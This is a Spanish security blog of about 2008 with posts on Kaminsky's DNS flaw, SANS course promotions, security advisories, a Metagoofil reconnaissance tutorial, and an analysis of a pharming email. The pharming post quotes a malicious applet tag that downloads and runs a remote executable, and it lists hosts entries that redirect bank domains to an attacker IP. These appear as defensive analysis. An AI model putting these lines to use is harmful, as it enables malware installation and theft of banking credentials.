Weblog de JaCkSecurity

Varias semanas atrás estuvimos averigüando la forma en que Dan Kaminsky determinaba cúando un DNS era vulnerable a su famoso hallazgo, al usar el DNS CHECKER en Doxpara.com.

Inicialmente pensamos en la posibilidad de recrear el DNS CHECKER vía un viejo y útil programa llamado, tcpreplay, bajo la premisa que a Kaminsky se la había fugado parte o toda la cadena de explotación, pero no fue así.

Luego de montar un DNS vulnerable en nuestro lab, descubrimos que los paquetes eran muy inofensivos, pero no quisimos dejar tanto esfuerzo en un simple, no se puede. Quisimos ir más allá, y no despreciar el análisis de los paquetes capturados, contra nuestro DNS vulnerable. Sugerimos que lleve el curso SEC503 si desea aprender cómo hacer esto.

Al analizar los paquetes, observamos renuencia de paquetes. Ellos no eran otra cosa que un prolongado juego de acertijos (por eso el título arriba) en el que estuvo entretenido nuestro DNS. Los acertijos a que nos referimos eran (como puede ver abajo) varias respuestas CNAME sucesivas para una consulta de un registro tipo A, aquí una representación cinematográfica de lo visto:

Interprete el escenario así:
[192.168.1.19] como Batman (nuestro DNS vulnerable)
[209.200.168.66] como El Acertijo (el servidor DNS de Kaminsky)
[190.232.39.215] como El público de la película (PC que hace click en el DNS Checker)

La técnica, que hemos bautizado aquí como “la técnica del acertijo”, es muy interesante. Si bien acá es usada para diagnosticar la vulnerabilidad descubierta por Kamisky, esta, puede ser usada para otros fines futuros. Observe, que la técnica de responder con acertijos, es una forma muy útil de provocar más de una (seudo) sesión (seuda por lo de UDP) a fin de aprender más del host que inicia la sesión. Por otro lado, si piensa por un momento que las respuestas con acertijos son agotadoras (como lo pueden ser las preguntas repetidas de un infante), entonces entenderá -también- que esta técnica puede ser usada para intentar agotar los recursos de un servidor DNS (tarea para los researchers que quieran crackear un BIND-acertijo)

En suma, Kaminsky no sólo nos ha mostrado (BlackHat 2008) su vulnerabilidad, también nos ha dejado algo más (doxpara.com), sólo hacía falta un poco de análisis.

Staff
JaCkSecurity
Conocimiento, conciencia, consultoría

He aquí un reto para la audiencia con espíritu de administrador de firewalls:

18:51:53.778949 IP 192.168.1.19.32968 > 201.230.87.59.53: 843+ A? sb.google.com. (31)
18:51:53.782595 IP 192.168.1.1.53 > 192.168.1.19.32968: 843- 1/0/0 A 209.85.133.93 (47)
18:51:53.782703 IP 192.168.1.19 > 192.168.1.1: ICMP 192.168.1.19 udp port 32968 unreachable, length 83

El ver la vieja película del superhéroe más conocido del último siglo puede ayudar a descifrar qué es lo que dicen estas 3 líneas.

Ayuda:
192.168.1.19 es un servidor DNS y también a la vez un cliente DNS.

Reto:
¿Qué está pasando aquí?

Quiere más, le invitamos a inscribirse al próximo SEC 503.

Staff
JaCkSecurity

Quién dijo que el tópico de “security awareness” era sólo para los empleados convencionales, Oh, no. Se equivoca, es para todos, incluyendo los administradores de sistemas y de redes, excepto que para ellos el panfleto debe cambiar, y volverse mas bien, más exhaustivo.

¿Alguien dijo exhaustivo? Oh, sí, la primera vez que escribé esa palabra en la web, fue para traducir el nombre el curso SEC503, un super curso, que por cierto, es muy oportuno para llevar a los administradores de sistemas y redes a un nivel de concientización de seguridad, más profundo que los simples dispositivos de seguridad que hoy manejan.

Alíste ahora e inscríbase al curso, que casi lo hemos hecho nuestro. Lleno de retos o challenges de seguridad, los participantes experimentarán en sus venas los bits y bytes que en pantalla en el libro hemos de revisar.

Y ojo con esto, pues esta vez somos dos especialistas de JaCkSecurity que vamos a dirigir el curso. Es un co-mentoring del SEC503 Intrusion Detection In-Depth, por algo, el primer curso de seguridad que llevé.

Es una excelente fusión: SANS Local Mentoring y JaCkSecurity’s Labs & Challenges

http://www.sans.org/info/30083

Javier Romero
JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría

SANS is bringing Sec 503: SANS Intrusion Detection In-Depth to your local community! Beginning on September 6th , SANS Mentor Javier Romero will be leading this class in Lima. For complete course details, please click on http://www.sans.org/info/30083.

Why Choose the Mentor Program?
The Mentor Program, http://www.sans.org/info/30088, consists of small, local run, 10 week classes (actually, in Peru it will running on 6 weeks) utilizing the same great SANS coursework presented at the larger conferences. Mentors and students report several major advantages to the Mentor format: Cost savings, time to digest the material, convenient evening classes, and community networking.

COST SAVINGS: Is the slowing economy resulting in reduced training budgets? With the SANS Mentor program, you save 25% off the regular SANS tuition fee with the ability to save even more with group discounts (see below). No need to spend money on travel and living expenses or spend a week away from the family.

PACED STUDY: Take 6 weeks not 6 days to work through and understand the material. Past students report that the slower pace allows them to absorb and apply the information. Each session provides you the opportunity to apply the materials the next day when you return to the office!

EVENING CLASSES: The Mentor program provides a method for learning the SANS materials and working towards a GIAC certification without taking time off from work.

COMMUNITY NETWORKING: The Mentor program allows you to work with local security professionals in an open discussion format. This community networking has been identified by students as a major benefit of the Mentor program.

One recent Mentor student commented, “I thought that the class was great. I would consider taking another SANS Mentor Program class. It was much more convenient than traveling and I had the ability to review material at my own pace.”

A SANS Institute course delivered locally in Lima by an experienced SANS Mentor who will lead you over a comfortable and convenient schedule, saving you money, while giving you the opportunity to network with local security professionals. What a great combination!! Plus SANS promises you will be able to use what you learn in the classroom as soon as you return to the office.

TUITION DISCOUNTS!
SANS offers group registration discounts for 2 or more students who register from the same organization. To obtain the Group Discount fee and Registration Code offered for this course, contact Miranda Ruddick at mentor[@]sans.org PRIOR to registering, and provide the names and
e-mail addresses of all the students registering within your organization.

Does this sound like the kind of training that would help you be more effective in your job? Then register today at http://www.sans.org/info/30083 and see for yourself the excellent value
of SANS training and GIAC certification!

SPECIAL MENTOR OFFER! Write “recruited by mentor” on the web form (under the text box “COMMENTS”) and the mentor will give you two additional hours of a special security workshop.

Dependiendo en qué tipo de entidad gubernamental o empresa de servicios te halles, es más que visto que necesitas un argumento fuerte para convencer a tus jefes para que te aprueben el presupuesto para ese curso avanzado de seguridad que tanto andabas buscando.

Si no has perdido las esperanzas, y todavía estás envuelto en el nivel técnico, y te respetan por ello, cuenta cuánto tiempo te tomas en entender esta técnica de amenaza, y compara si ese es el tiempo que deberías tomarte para responder a un incidente similar.

http://isc.sans.org/diary.html?storyid=4645

Próximamente: SEC503, Intrusion Detection In-Depth

Javier Romero
JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría

Si vas a alojar tu web en una granja de servidores dedicada a hospedar otras, es recomendable solicitar al proveedor el aseguramiento de la LAN vía directivas estrictas de protección contra envenenamiento de tabla ARP.

El amago de secuestro que le procuraron a la web de Metasploit es un ejemplo claro de la situación. Así, que ya sabe qué pedirle de nuevo a su proveedor de hosting y colocation para estas fiestas patrias que se acercan.

Javier Romero, CTO
JaCkSecurity
Conocimiento, Conciencia y Consultoría

Este post va dedicado para aquellos usuarios de Windows que aún no quieren dejar de usar privilegios altos en sus estaciones mientras navegan.

Según Microsoft existiría una nueva amenaza combinada para quienes hayan instalado el navegador de Apple en sus Windows. Al parecer, Safari permitiría silenciosamente la instalación de cualquier ejecutable que así se lo pida desde alguna página maliciosa, cuando corre en Windows.

Quien sino -especialmente- los más geek han probado Safari en sus Windows, seguramente para tener la ligera sensación de una Apple, o para experimentar de la velocidad de ejecución de este navegador, además de otras cosas.

A ellos, los especialistas de seguridad de Microsoft les recomiendan la desintalación y no uso de Safari en sus sistemas Windows (XP y Vista) hasta que Apple o Microsoft mismo resuelvan esta debilidad, que los amenaza por usar Safari.

Si el mensaje no es claro, no importa, porque la misma empresa Microsoft pone -tal si fuera premio consuelo- la salvedad que aún no han observado explotación activa de esta debilidad en la red.

No nos engañemos, la seguridad es un estado mental que todos debemos combatir día a día con noticias como esta, especialmente cuando se tiene algo de Apple (de quienes la consideran segura) en una Windows (de quienes lo consideran la más insegura).

Mucho cuidado, usted está advertido.

Staff
JaCkSecurity
Conocimiento, Conciencia, Consultoría

Hace unas semanas un amigo nuestro, especialista en Debian, nos hizo saber de una importante vulnerabilidad en Debian. Quizás sea un poco tarde para platicar del tema, pero he aquí la imagen que lo resume todo.

Staff
JaCkSecurity
Conocimiento, Conciencia y Consultoría

JaCkSecurity ha documentado un pharming que recibiese el martes 13 mayo 2008 (Tue, 13 May 2008 19:02:28 -0400)

EVIDENCIA PRINCIPAL

To: javier@jacksecurity.com
Subject: Video parodia de Tula Rodriguez y su embarazo
From: Maria Isabel

Hola;
Maria te recomienda la siguiente noticia: Video Parodia (burla) de Tula Rodriguez y su embarazo
URL: http://club-classic.nl/noticias/Video_parodia_de_Tula_Rodriguez_y_su_embarazo.html
Mira este video je je, se aprecia a una joven que imita a Tula al mejor estilo de una artista cómica
y cuenta de manera sarcástica el momento de la inusual confesión.
Esperamos que sea de tu agrado.
Saludos,

Análisis principal

Invocación maliciosa:
< a p p l e t name="link" code="Inicio.class" archive="http://boardpix.com/lehigh/content/Crow/ link . jar" height="10" width="1"> < p a r a m name="url" value="http : // boardpix . com /lehigh/content/Crow/xxxxxxxx.exe"> < / applet >

Análisis del binario que trata de instalarse sigilosamente:
http://www.threatexpert.com/report.aspx?md5=d010e2779c2a175ada1d9a548654bbfe

Datos del archivo referido dentro del binario:
72.249.25.219 viabcp.com
72.249.25.219 http://viabcp.com
72.249.25.219 www.viabcp.com
72.249.25.219 pagum.com
72.249.25.219 http://pagum.com
72.249.25.219 www.pagum.com
72.249.25.219 peb1.bbvanetlatam.com

Servidores de terceros afectados en el pharming:
club-classic.nl (donde se aloja la trampa visual)
boardpix.com (donde se aloja el binario)
no-problem.com.mx (donde se aloja las direcciones IP referidas por el binario)

Cabecera del correo original

From - Tue May 13 18:02:58 2008
X-Account-Key: account2
X-UIDL: UID17353-1168226604
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-path:
Envelope-to: javier@jacksecurity.com
Delivery-date: Tue, 13 May 2008 19:02:37 -0400
Received: from jsadmin by a2s5.a2hosting.com with local-bsmtp (Exim 4.68)
(envelope-from )
id 1Jw3Vs-00025y-Uy
for javier@jacksecurity.com; Tue, 13 May 2008 19:02:37 -0400
X-Spam-Checker-Version: SpamAssassin 3.2.3 (2007-08-08) on a2s5.a2hosting.com
X-Spam-Level: **
X-Spam-Status: No, score=2.8 required=5.0 tests=HTML_MESSAGE,
HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,RDNS_NONE autolearn=disabled
version=3.2.3
Received: from [74.53.114.5] (helo=demodocus.site5.com)
by a2s5.a2hosting.com with esmtps (TLSv1:AES256-SHA:256)
(Exim 4.68)
(envelope-from )
id 1Jw3Vs-00025g-EC
for javier@jacksecurity.com; Tue, 13 May 2008 19:02:28 -0400
Received: from idham by demodocus.site5.com with local (Exim 4.68)
(envelope-from )
id 1Jw3Vd-00032t-Iv
for javier@jacksecurity.com; Tue, 13 May 2008 18:02:13 -0500
To: javier@jacksecurity.com
Subject: Video parodia de Tula Rodriguez y su embarazo
From: Maria Isabel
Content-type: text/html
MIME-Version: 1.0rn
Message-Id:
Date: Tue, 13 May 2008 18:02:13 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - demodocus.site5.com
X-AntiAbuse: Original Domain - jacksecurity.com
X-AntiAbuse: Originator/Caller UID/GID - [33075 501] / [47 12]
X-AntiAbuse: Sender Address Domain - demodocus.site5.com
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php indexx.php
X-Source-Dir: khairilidham.com:/public_html/content

Enlaces de terceros que fueron usados:
http://www.elgonzi.com/2008/05/video-parodia-de-tula-rodriguez-y-su.html
http://www.youtube.com/watch?v=Q4QwiLk183o

Staff
JaCkSecurity
Conocimiento, Conciencia y Consultoría

Ocasionalmente, en varias de las charlas a las que tenido el privilegio de ser invitado he mencionado a metagoofil como instrumento de hacking pasivo y para auto auditorias. Por esa razón y en mérito a la nueva versión 1.4, decidí documentar en este post la utilidad y algunas otras cosas más de esta herramienta.

Primero, es necesario saber que Metagoofil puede ejecutarse en Windows, Linux y MacOS, ya que está escrito en Python. Sin embargo, quizás halle más sencillo y transparente el instalarlo en un Linux. Así, si usas -por ejemplo- Debian, asegúrase de tener instalado el programa “extract”, que lo instalas con “apt-get install extract”. Para ello, es posible que debas instalar el libextractor también “apt-get install libextractor”. Si no lo tienes en tu lista de paquetes, actualízala primero, con “apt-get update”. Si la lista no se actualiza, sugiero meterle mano al /etc/apt/sources.list (Consulta http://www.debian.org/distrib/packages#view por “libextractor” para tener la ruta más apropiada). Yo uso Debian4 (etch).

Segundo, si estás usando un Linux dentro de una máquina virtual, asegúrate de no porfiar tu ejecución basado en una interfase virtual que dependa de una inalámbrica, pues por alguna razón (que presumo se provoca en la confección de paquete) varias de mis pruebas fracasaron desde dicha interfase. Usa una interfase Ethernet (red cableada).

Asi mismo, vas a tener problemas con extract, así que (usando “find / -name extract”) asegúrate de modificar el script “metagoofil.py” e indicar la ruta real del programa extract que usará metagoofil. De todos modos, obtendrás un error a la salida al momento de ejecutar metagoofil.

Dado que está escrito en Python, todo lo que tienes que hacer en tu sistema es desempaquetarlos (”tar -xvf metagoofil.tar”). Si tu Linux corre en modo texto, no te apenes, recuerda que puedes usar “wget” para descargar el archivo (posiblemente en /tools) con “wget http://www.edge-security.com/soft/metagoofil-1.4.tar”. Recuerda, si no tienes “wget”, instálalo con un “apt-get wget”.

Luego, para ejecutar metagoofil sólo deberás invocar el script conforme la ayuda misma que se provoca al tipear “./metagoofil.py”. Allí notarás que debes asignarle un valor a cada variable del script. Veamos, luce así:

./metagoofil.py -d jacksecurity.com -l 20 -f all -o prueba.html -t files

Así, la salida se grabará en /tools/metagoofil/files, y el archivo principal estará en /tools/metagoofil/prueba.html.

En la prueba hecha a nuestro dominio, se descubrieron usuarios como: easyPDF SDK 4.3, JR, blanca, sin ninguna ruta valiosa. No obstante, aunque sólo en uno de esos casos se descubre un viejo usuario de nuestros sistemas, también se halla un dato curioso: easyPDF SDK 4.3, que lejos de ser un usuario nuestro, denota qué fabricante ha confeccionado uno de los PDF descargados (en Google: “easyPDF SDK 4.3″). Este último dato, que a pesar de ser un desperdicio para un ataque de fuerza bruta, no lo es para identificar posibles vulnerabilidades en esta pieza de archivo (una idea un tanto diabólica, y por ahora improbable).

¿Qué puedes hacer con Metagoofil? Puedes extraer la data de la data, y deducir algo más que usuarios, aún con archivos tan limitados como los nuestros. Por otro lado, aunque su utilidad ha sido ampliamente difundida para trabajos de auditoria y hacking externo, nada impediría que alguien rediseñe el script para búsquedas en Intranets, y así hallar usuarios cuando no se pudo obtener la base de usuarios por ataques de null-sessions.

¿Tip de contra-ataque?
Busca en tus logs del servidor web, sentencias como “Python-urllib/1.16″, y verás que archivos fueron auditados por “metagoofil”, ya sea en manos tuyas o en manos de terceros.

Javier Romero
JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría

(PARTE 1) Cuando una organización (pública o privada) sufre una fuga de información de algún sistema informático, es inevitable que los líderes de la misma recurran a su departamento de seguridad TI como primera instancia para ayuda forense.

La razón principal de este relación, es precisamente la fuente de almacenamiento principal de dicha información, un sistema informático. En ese sentido, los posibles vehículos de fuga posible pueden variar en un no muy gran avanico de posibilidades: los medios magnéticos (tapes), los medios de almacenamiento óptico (CD/DVD), el mismo disco duro del sistema informático, los USB-drives, y la red.

Aunque dependiendo del criterio del especialista, uno de los medios de fuga que se deben descartar primero es la red. A diferencia de un USB-drive, tape, CD o DVD, que puede ser confiscado físicamente en la portería de la organización (no obstante, de generar una ruidosa condición de pánico al personal y de alerta al “insider”), la red podría seguir siendo un medio incontrolable de fuga de información, luego del incidente. De esta forma, la red debe ser el primer medio de despistaje forense al alcance del departamento de seguridad TI.

Una forma efectiva pero -muy criticada por su factibilidad- es el despliegue de capturadores de tráfico en los cuellos de la red de la organización. Un mecanismo de captura puede ser ubicado y configurado a diferentes nivel de detalle, que un analista de protocolos puede acomodarse sin mayor problemas. Su principal detractor es el espacio de almacenamiento que requieren los equipos de captura, cuya demanda será proporcional al tráfico de la red.

Sin embargo, una forma más inteligente y económica es el despliegue de colectores de flujos (flows). Los colectores de flows pueden ser consultados luego de viajar a un sistema de base de datos, en tiempo real o hacia atrás. Ello permite al analista forense, realizar una infinita cantidad de consultas por el tráfico de la red, a fin de determinar la duracción, tamaño, y equipos que mantuvieron ciertas comunicaciones sospechosas.

Una fuga de información como la sufrida recientemente por la nación chilena, requiere -por ejemplo- de este tipo de evidencias rápidas. Viajando a través de un análisis exhaustivo de los flujos generados por las redes de las instituciones afectadas, el analista buscará el tráfico que represente la transferencia (upload o download) de semejante volumen de datos, hacia RapidShare o hacia cualquier otro lugar en la red, desde o hacia los sistemas afectados.

JaCkSecurity dispone de mecanismos para ayudarlo a preparse tempranamente para penosos e inevitables incidentes como estos. Sírvase consultarnos por estos mecanismos.

Javier Romero
JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría

Honestamente, desde que descubrí que es posible vivir sin un antivirus instalado en portátiles, PCs y servidores, jamás había apreciado a los antivirus -en sí mismos- como una fuerza de poder en el cuadrilátero de la seguridad informática, excepto claro por sus elegantes equipos de ingenieros que -hoy en día- divulgan sus hallazgos a toda la comunidad experta. Sin embargo, luego de leer esta noticia (JaCkNews), concluyo lo contrario.

Resulta que ahora, el mismo elemento -el malware- por el cuál ahora son tan inefectivos, se han vuelto a su favor. Efectivamente, como cita Hispasec, los desarrolladores de kits de malware (para botnets) han delegado el “poder” del embargo a las casas de antivirus, para protegerse de la piratería, qué formidable idea. Dicho de otra forma, se trata de convertir a los antivirus en un team gratuito de un embargo virtual de un software maligno que ha sido pirateado.

El único problema es que el poder que ejercerían los antivirus sería ahora a favor de la industria criminal contra quienes intentan luchar. Pero, guardándonos la impresión de sorpresa, podemos decir, que esta no es la primera vez que vemos una conducta similar en el mundo criminal, en realidad sucede a todos los niveles del crimen. Sin le pegamos una vista a los gobiernos, esto es exactamente lo que hacen sus personajes corruptos cuando quieren vengarse de otros más (o mas bien menos) corruptos, al soplarlos y revelarlos a la opinión pública.

Por último, aunque asumo que para muchos lectores los AV siempre fueron una fuerza de poder “del bien” en sí mismo, no debemos de dejar de reconocer que -ahora- se han convertido en la fuerza de poder a favor del mal, aún sin siquiera saberlo.

La próxima que invierte S/.240.00 (USD 80.00) en una caja completa de AV piense que su contribución económica a su marca favorita no sólo hará de su proveedor una fuerza de poder del bien (según usted así lo cree), sino también del mal. “Piense”, y no se disguste luego.

Javier Romero
JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría

Posiblemente, lo único de particular que tiene Kraken sea el hecho de haber cubierto varios medios noticiosos del Internet, en sólo una semana.

Tal parece que la moda de hoy (2008) es hablar de botnets nuevas, categorizadas no por su peligrosidad, ni ferocidad, sino por su tamaño (400,000 PCs en el caso de Kraken, que es comparada con Storm Worm de 200k), muy contrario a lo que en el pasado se hacía con los virus, donde sólo valía su peligrosidad, y a veces hasta su rápidez mediática, para convertirlas en noticia.

Sin embargo, como en todo, la verdad pocas veces noticia. Las botnets -en realidad- son cuantiosas en todo el mundo, pero con un pequeño número de zombis. Un mismo atacante puede manejar varias botnets, todas ellas, pequeñas en población. El negocio está en no ser detectado, no en ser detectado. Por esa razón, nace la suspicacia de quiénes son -en realidad- los que crean estas botnets “supuestamente grandes”.

Como sea, esta es una prueba más que los virus son historia: ¿acaso no también los antivirus?

Para su curiosidad de Kraken, lea más este blog.

Javier Romero
JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría

La experiencia de campo

En las últimos boletines de JaCkNews, varios de los editores han hecho incapié a la importancia de los programas de concientización de seguridad de la información para los empleados. Por esa razón y conocedores de la experiencia de campo de dos de ellos, JaCkSecurity ha realizado una entrevista de nada menos que 11 preguntas, cuyos tópicos fueron:

1. Motivación para crear la campaña
2. Objetivo de cada campaña
3. Obstáculos para desarrollar las campañas
4. Habilidades del líder de la campaña
5. Ayuda externa requerida
6. Resultado y beneficios de las campañas
7. Daños de una mala campaña
8. Otras compañías que hacen lo mismo
9. El futuro de este tipo de trabajos
10. Área líder
11. Restricciones para ciertas empresas

La entrevista puede ser descargada del portal, en la siguiente dirección:
http://www.jacksecurity.com/publicacion.php?idpub=72

JaCkSecurity
Conocimiento, Conciencia y Consultoría

Usando su propia página principal, y en un espacio equivalente al 50% de la cabecera de la misma, el banco Scotiabank muestra y alerta el peligro de seguridad a sus usuarios. Hacer click en este aviso, tiene más probabilidades que el promedio de los bancos.

Este blog expresa sus felicitaciones al equipo que gestionó tan ejemplar anuncio.

Staff
JaCkSecurity
Conocimiento, Conciencia y Consultoría